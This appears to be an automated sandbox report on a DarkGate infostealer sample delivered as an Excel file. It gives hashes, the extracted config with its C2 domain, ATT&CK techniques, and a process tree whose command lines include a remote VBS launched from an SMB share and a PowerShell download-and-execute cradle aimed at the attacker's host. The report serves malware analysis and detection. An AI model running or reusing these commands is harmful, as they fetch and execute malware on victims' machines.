darkgate | abadc5f79d85d395c7760c93d635c885f4ea7cdf872986332c650ffbf2ad9984

General

Target

scan-28-02-24_3136.xlsx
Size

29KB
MD5

9d51efbfb3733f9e41a3ca833eecd843
SHA1

bfb4462b184d7cde4d382dd4104b721ac4b4ab8f
SHA256

abadc5f79d85d395c7760c93d635c885f4ea7cdf872986332c650ffbf2ad9984
SHA512

955a1d6a7173dcac1d44374923530ca106d83afd7aa24b0aecd246b83d7cc94ea88b26f858717db858ef987769c1152ef79e18674c36699de3eca305519cbfa8
SSDEEP

768:wnEQpllh7tAafroiianGoHoJ+yWWn0WhtEk:nQJh7Lro4ntD+0AEk

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

cayennesxque.boo

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
HwHLLNLY
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/3732-63-0x0000000005840000-0x0000000005B8F000-memory.dmp	family_darkgate_v6
behavioral2/memory/3732-65-0x0000000005840000-0x0000000005B8F000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2176	3448	WScript.exe	37

Blocklisted process makes network request 4 IoCs

flow	pid	Process
40	4148	powershell.exe
42	4148	powershell.exe
43	4148	powershell.exe
53	4148	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3732	AutoIt3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3448	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4148	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE
3448	EXCEL.EXE

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 3448 wrote to memory of 2176	3448	EXCEL.EXE	96
PID 3448 wrote to memory of 2176	3448	EXCEL.EXE	96
PID 2176 wrote to memory of 4148	2176	WScript.exe	97
PID 2176 wrote to memory of 4148	2176	WScript.exe	97
PID 4148 wrote to memory of 3732	4148	powershell.exe	100
PID 4148 wrote to memory of 3732	4148	powershell.exe	100
PID 4148 wrote to memory of 3732	4148	powershell.exe	100

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_3136.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/jzpdvxcn')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\temp\AutoIt3.exe
      "C:\temp\AutoIt3.exe" script.a3x
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:3732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uv3hfegl.qk0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\temp\script.a3x

Filesize
472KB

MD5
8e60a79c1b465ab143888b66f90cf5d6

SHA1
b1177d88a91017bae0e2aafbf5d19acd505179bf

SHA256
a08fc871fc74e01e2d877a4ba7aefc4951363d3b31fa5f6df4c03a33734107a6

SHA512
847da6254f3c7d51e3f7d39a13afab22f64272451be1c7d2df3df916e0df406bc0d6ab1b5623d777fddba715dfae0abe93c6cf5cef3eb173fd73aee888c767e8

Download Submit
C:\temp\test.txt

Filesize
76B

MD5
b7b976bcbbca1facd2941f6bdf2cb51e

SHA1
12a5b518283d72f43e73850327bf81d9456d8cc6

SHA256
0de3c9bae4138c45d98519686256df51f4f5724ff3483552fcb873403415c812

SHA512
e055a38ffb8d70b441e58dfb7d748f197bf631ae4f5da1c8a9398a6d2b06a70ea7087d6756229b57ffc9e28aecebf7c2cd340c6cae91e726333450668c1dfa80

Download Submit
memory/3448-15-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-27-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-6-0x00007FF85A870000-0x00007FF85A880000-memory.dmp

Filesize
64KB

Download
memory/3448-7-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-8-0x00007FF85A870000-0x00007FF85A880000-memory.dmp

Filesize
64KB

Download
memory/3448-9-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-10-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-11-0x00007FF8587C0000-0x00007FF8587D0000-memory.dmp

Filesize
64KB

Download
memory/3448-12-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-13-0x00007FF8587C0000-0x00007FF8587D0000-memory.dmp

Filesize
64KB

Download
memory/3448-14-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-16-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-0-0x00007FF85A870000-0x00007FF85A880000-memory.dmp

Filesize
64KB

Download
memory/3448-17-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-26-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-3-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-5-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-2-0x00007FF89A7F0000-0x00007FF89A9E5000-memory.dmp

Filesize
2.0MB

Download
memory/3448-1-0x00007FF85A870000-0x00007FF85A880000-memory.dmp

Filesize
64KB

Download
memory/3448-4-0x00007FF85A870000-0x00007FF85A880000-memory.dmp

Filesize
64KB

Download
memory/3732-62-0x0000000004350000-0x0000000005320000-memory.dmp

Filesize
15.8MB

Download
memory/3732-63-0x0000000005840000-0x0000000005B8F000-memory.dmp

Filesize
3.3MB

Download
memory/3732-65-0x0000000005840000-0x0000000005B8F000-memory.dmp

Filesize
3.3MB

Download
memory/4148-39-0x0000017D03BE0000-0x0000017D03BF0000-memory.dmp

Filesize
64KB

Download
memory/4148-41-0x0000017D1C390000-0x0000017D1C552000-memory.dmp

Filesize
1.8MB

Download
memory/4148-40-0x0000017D03BE0000-0x0000017D03BF0000-memory.dmp

Filesize
64KB

Download
memory/4148-54-0x0000017D03BE0000-0x0000017D03BF0000-memory.dmp

Filesize
64KB

Download
memory/4148-55-0x0000017D03BE0000-0x0000017D03BF0000-memory.dmp

Filesize
64KB

Download
memory/4148-38-0x00007FF871F60000-0x00007FF872A21000-memory.dmp

Filesize
10.8MB

Download
memory/4148-37-0x0000017D03BB0000-0x0000017D03BD2000-memory.dmp

Filesize
136KB

Download
memory/4148-59-0x00007FF871F60000-0x00007FF872A21000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads